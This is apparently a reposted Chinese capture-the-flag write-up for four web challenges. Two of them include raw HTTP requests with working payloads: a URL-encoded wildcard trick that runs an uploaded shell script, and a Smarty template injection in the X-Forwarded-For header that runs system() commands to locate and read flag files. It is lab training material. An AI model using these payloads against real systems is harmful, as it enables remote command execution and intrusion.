某卫生CTF-web-WriteUP

  • A+
所属分类:逆向工程

1.签到

直接右键查看源代码,over

2.easy_web1

某卫生CTF-web-WriteUP

3.easy_web2

某卫生CTF-web-WriteUP

抄的我p神的思路

POST /?shell=.%20%2F%3F%3F%3F%2F%3F%3F%3F%3F%3F%3F%3F%3F%5B%40-%5B%5D HTTP/1.1Host: cloudeci1.ichunqiu.comContent-Length: 206Cache-Control: max-age=0Origin: nullUpgrade-Insecure-Requests: 1DNT: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrLrIdoDjGOhHKAwUUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundaryrLrIdoDjGOhHKAwUContent-Disposition: form-data; name="upload"; filename="a.txt"Content-Type: text/plain
#! /bin/sh
cat /flag.txt------WebKitFormBoundaryrLrIdoDjGOhHKAwU--

参考文章 https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

4.super_hacker

测试发现,执行命令不能含有空格和i

用assert执行post里面的内容就可以了,先find一下,然后再cat。over

POST / HTTP/1.1Host: eci-.cloudeci1.ichunqiu.comPragma: no-cacheCache-Control: no-cacheOrigin: http://eci-.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36DNT: 1Accept: */*Via: 1.1 vegurX-Forwarded-For: {assert($smarty.post.a)}Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: __jsluid_h=f8c4073200e23f9fef8f14be5a907849Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 31
a=system("find / -name 'flag'")


本文始发于微信公众号(漏洞推送):某卫生CTF-web-WriteUP

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: